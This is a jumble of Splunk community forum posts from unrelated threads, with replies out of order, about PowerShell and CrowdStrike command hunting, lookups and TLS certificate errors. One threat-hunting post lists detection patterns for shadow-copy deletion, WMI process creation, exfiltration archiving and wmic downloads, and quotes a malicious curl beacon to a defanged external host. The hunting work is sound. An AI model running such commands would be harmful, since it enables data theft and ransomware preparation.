I tried with lookup definition "WILDCARD(commands)" but that didn't work!
Hello Community! I am trying to set up a search to monitor PowerShell commands from Windows hosts; specifically, I am starting from:
an index with the full messages related to PS commands, contained in a field named "Message" (related, for example, to event codes 4101, 800, etc.)
a .csv file, with the list of commands I would like to monitor, contained in a column named "PS_command".
From these premises, I have already constructed a search that leverages inputlookup to search the strings from the PS-monitored.csv file in the index field Message, outputting the result in a table, as follows (adding also details from the index: _time, host and EventCode).

index="wineventlog"
| search ( [| inputlookup PS-monitored.csv | eval Message= "*" + PS_command + "*" | fields Message] )
| table _time host EventCode Message

This, despite not being the most elegant solution (with the addition of wildcard characters *), is currently working; however, I would also like to include the original search field (PS_command column from PS-monitored.csv) in the final table. I tried to experiment a bit with the lookup command, and with join options, without success; does anyone have some suggestions? Finally, I would like to avoid using heavy commands, such as join, if at all possible. Thanks in advance!
To use wildcards in lookups they have to be defined as match type WILDCARD: https://docs.splunk.com/Documentation/Splunk/9.2.1/Knowledge/Usefieldlookupstoaddinformationtoyourevents#Create_a_CSV_lookup_definition
Start with a search that returns the data you are interested in visualising. Do you have this already?
What do you get when you try this?

index=application_na sourcetype=my_logs:hec source=my_Logger_PROD retrievePayments* returncode=Error
| rex field=message "Message=.* \((?<apiName>\w+?) -"
| chart count over client by apiName
Hello Shubham, In addition to Ryan's suggestion, I'm posting more useful links for your reference in case those may help. Please note AppDynamics moved extensions under an open-source model, to enable customers to directly evolve them to suit their needs / build new use cases; you can find more information at https://docs.appdynamics.com/display/PAA/Support+Advisory%3A+Changes+to+Extensions+Support+Model We have also documented answers to the most common extension queries along with troubleshooting tips and tricks in the following links: Extensions troubleshooting, Advanced Extensions Troubleshooting. Best Regards, Rajesh Ganapavarapu
Need a report based on the previous day. I have source IP segment xx.xx.xx.xx/28, & destination IP segment xx.xx.xx/24. The outcome of the query should provide the below:
Date and start + end time of the connection
USERNAME
APPLICATION:PORT & PROTOCOL
APPLICATION SEGMENTS
ACCESS POLICY NAME
ACTION
How can I create a customized dashboard? Please suggest.
It would help if you could share some anonymised raw events in a code block to prevent formatting corruptions, that way we can see what you are working with and be better able to guide you.
Try a couple of things. Add the below to inputs.conf and restart (YOUR CA CERT):

[SSL]
rootCA = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem

Run these to validate the certs - see if they read and show information:

openssl rsa -in /opt/splunk/etc/auth/mycerts/myServerCertificate.pem -text
openssl x509 -in /opt/splunk/etc/auth/mycerts/myServerCertificate.pem -text -noout
All - I am new to Splunk and trying to figure out a way to return a matched command from a CSV table with inputlookup. I have an ioc_check table containing command strings and descriptions as below:

commands | description
7z a -t7z -r | Compress data for exfiltration
vssadmin.* Delete Shadows | Deletion of Shadow copy
*wmic*process*call*create* | Uses WMI to create processes
wmic*get*http | Using wmic to get and run files from internet

I am using this lookup table's commands strings against the CrowdStrike CommandLine to hunt for any matching commands run by any user in our environment. So when the CommandLine field from CrowdStrike logs matches any command string from the lookup table, it should generate an alert. What we are trying to achieve is that when there is an alert it should also tell us the description of the matching command, so we know which command matched the CrowdStrike CommandLine. The final result should be like this:

CommandLine | description | commands
curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d | Using wmic to get and run files from internet | wmic*get*http

I have come up with the below search; it gives me an alert but is not able to display the matching command and description. Any help would be much appreciated!

index=crowdstrike event_simpleName=ProcessRollup2 [| inputlookup ioc_check | eval CommandLine="*"+commands+"*" | fields CommandLine]
| lookup ioc_check commands OUTPUT description
| table _time, CommandLine, description, commands
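One way to get the matching pattern and its description back into the results, for both the PowerShell-monitoring post above and this CrowdStrike one: an added example, not the posters' own searches or Splunk documentation, which assumes a lookup file ioc_check.csv with the columns commands and description, app-level transforms.conf and savedsearches.conf, and the index and sourcetype names from the post.

```ini
# transforms.conf: make the lookup a wildcard lookup so "*" in the commands
# column matches anywhere in the event field it is compared against.
[ioc_check]
filename = ioc_check.csv
match_type = WILDCARD(commands)
# Lookups are case-sensitive by default; command lines vary in case.
case_sensitive_match = false
# One matching row per event keeps the output one-to-one.
max_matches = 1

# savedsearches.conf: the alert. The subsearch keeps the cheap index-time
# pre-filter from the post; the lookup then enriches each surviving event
# with the row that matched. Outputting the key column itself
# ("commands AS matched_command") is what exposes the pattern that fired.
# A row only matches inside a longer CommandLine if it carries "*" on both
# sides, e.g. "*vssadmin*delete*shadows*" rather than "vssadmin.*".
[ioc_check_commandline_match]
search = index=crowdstrike event_simpleName=ProcessRollup2 \
    [| inputlookup ioc_check | eval CommandLine="*".commands."*" | fields CommandLine] \
    | lookup ioc_check commands AS CommandLine OUTPUT commands AS matched_command description \
    | where isnotnull(matched_command) \
    | table _time CommandLine matched_command description
enableSched = 1
cron_schedule = */15 * * * *
dispatch.earliest_time = -20m
dispatch.latest_time = now
alert_type = number of events
alert_comparator = greater than
alert_threshold = 0
alert.track = 1
```

Events that pass the subsearch but get no matched_command are worth a look: that usually means the CSV row lacks the surrounding "*" or differs in case from the event.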
Hmm. I still get the same error. Certs permissions:   After restart, Splunkd.log:  
Other attributes that *may* distinguish a report include alert.track and alert_condition, but I've found alert_type to be the best. You won't find this information documented. It's tribal knowledge and now you're part of the tribe. Seriously, you can use your browser's console to view the REST commands sent for the UI's Searches, Reports, and Alerts dashboard to see how the two types are differentiated.
Hello, I'm still new to SPLUNK and still learning, so apologies for any incorrect naming. I have a search in SPLUNK that runs daily and does some filtering to then look up an indexed .csv for additional information. The indexed .csv is injected into SPLUNK daily and the files are called "YYYY-MM-DD Report.csv". The search is supposed to take that into consideration and look at the latest report based on the date in the subject. It currently looks like this:

| rename Letter as C1111
| table A1111, B1111, C1111
| join type=left C1111 [ search earliest=-24h host="AAA" index="BBB" sourcetype="CCC"
    | eval dateFile=strftime(now(), "%Y-%m-%d")
    | where like(source,"%".dateFile."%Report.csv")
    | rename "Number" as C1111
    | eval C1111=lower(C1111)
    | fields C1111, "1 xxxx","2 yyyy","3 zzzz"]
| table A1111, B1111, C1111, "1 xxxx","2 yyyy","3 zzzz"

This used to work but stopped a few days back and I'm unable to figure out what the issue might be.
From the screenshot of file permissions - the files look like they are owned by root; set those for the splunk user and try that.
Hi @Zazou, apps.splunk.com should be sufficient to download apps, but anyway, you can do this from your workstation, without opening any firewall route (that's better!) Ciao. Giuseppe
Hi guys! I'm trying to allow Splunk to access the internet to browse and download apps. So far I have opened up "apps.splunk.com" and "splunkbase.splunk.com", but it doesn't seem to do the trick. Any other URLs I need to allow?
Tried that already, no dice.
Try this for starters:

blacklist1 = EventCode="4663" Message="Account Name:\s+COMPUTER8-55\$"
Hi @SplunkerNoob, as I said, see the Security Essentials App and you'll find hundreds of searches, also for threat hunting. Ciao. Giuseppe
Hello. I'm new at Splunk. Recently, I am trying to create and sign my own TLS certificates, following this official guide: https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/Howtoself-signcertificates However, splunkd.log keeps on showing this error:

Error setting up SSL for TCP data input from file=inputs.conf stanza="SSL": Can't read key file /opt/splunk/etc/auth/mycerts/myServerCertificate.pem SSL error code=151441516 message="error:0906D06C:PEM routines:PEM_read_bio:no start line"

First, by following the guide, I created:
private key of the root certificate authority certificate, which is myCertAuthPrivateKey.key
CSR for the certificate, which is myCertAuthCertificate.csr
root certificate authority certificate, which is myCertAuthCertificate.pem
Moreover, I created a server certificate and signed it with the root certificate authority certificate:
private key for the server certificate, which is myServerPrivateKey.key
CSR for the server certificate, which is myServerCertificate.csr
server certificate, which is myServerCertificate.pem
Basically, following the guide, I have 6 files in the mycerts folder, and one srl file. This Splunk Master is a master node that connects to 3 indexers (clustering). I followed this guide to modify the configuration files, which are inputs.conf and server.conf I believe. Ref: https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/ConfigureSplunkforwardingtousesignedcertificates 6+1 files for certificates.

/opt/splunk/etc/system/local/server.conf
[general]
...
[sslConfig]
sslRootCAPath = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem
sslPassword = mypassword
...

/opt/splunk/etc/system/local/inputs.conf
[splunktcp-ssl:9997]
disabled=0
[SSL]
serverCert = /opt/splunk/etc/auth/mycerts/myServerCertificate.pem
sslPassword = mypassword
requireClientCert = true
sslVersions = *,-ssl2

Every time I do service splunk restart, I still get the SSL error. Anyone know why and what's happening?
Same error is also happening in any other indexes. (same steps as i mentioned above)
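A quick way to check the file that serverCert points at before restarting, as an added example that is not from this thread or from Splunk's own tooling: it assumes the paths from the post and only inspects the PEM layout that the "no start line" error complains about.

```shell
# Added check (not from the thread or from Splunk): inspect the PEM file that
# inputs.conf [SSL] serverCert points at. Splunk reads the private key from
# that same file, so it must hold the server certificate, the private key and
# the CA certificate together; "PEM_read_bio:no start line" means OpenSSL
# found no usable "-----BEGIN ...-----" line where it expected the key.

# Count the PEM blocks of one kind ("CERTIFICATE" or "PRIVATE KEY") in a file.
pem_blocks() {
    grep -c "^-----BEGIN .*$1-----\$" "$2" || true
}

# Return 0 when the file is readable, has clean line endings and contains at
# least one certificate and one private key block; otherwise say why and
# return 1.
check_splunk_pem() {
    file="$1"
    if [ ! -r "$file" ]; then
        echo "cannot read $file (is it owned by the user running splunkd?)"
        return 1
    fi
    # A UTF-8 BOM or CRLF line endings (file saved by a Windows editor) hide
    # the BEGIN line from the PEM parser and produce the same error.
    if [ "$(head -c 3 "$file" | od -An -tx1 | tr -d ' \n')" = "efbbbf" ]; then
        echo "$file starts with a UTF-8 BOM; re-save it as plain ASCII"
        return 1
    fi
    if grep -q "$(printf '\r')" "$file"; then
        echo "$file has CRLF line endings; strip them with tr -d '\\r'"
        return 1
    fi
    certs=$(pem_blocks "CERTIFICATE" "$file")
    keys=$(pem_blocks "PRIVATE KEY" "$file")
    echo "$file: $certs certificate block(s), $keys private key block(s)"
    if [ "$keys" -eq 0 ]; then
        echo "no private key in $file: concatenate server cert, key and CA cert into one PEM"
        return 1
    fi
    if [ "$certs" -eq 0 ]; then
        echo "no certificate in $file"
        return 1
    fi
    return 0
}

# Usage with the path from the post (constructed call, adjust to your layout):
# check_splunk_pem /opt/splunk/etc/auth/mycerts/myServerCertificate.pem
```

Run it as the user splunkd runs as, so the readability check reflects what the daemon actually sees.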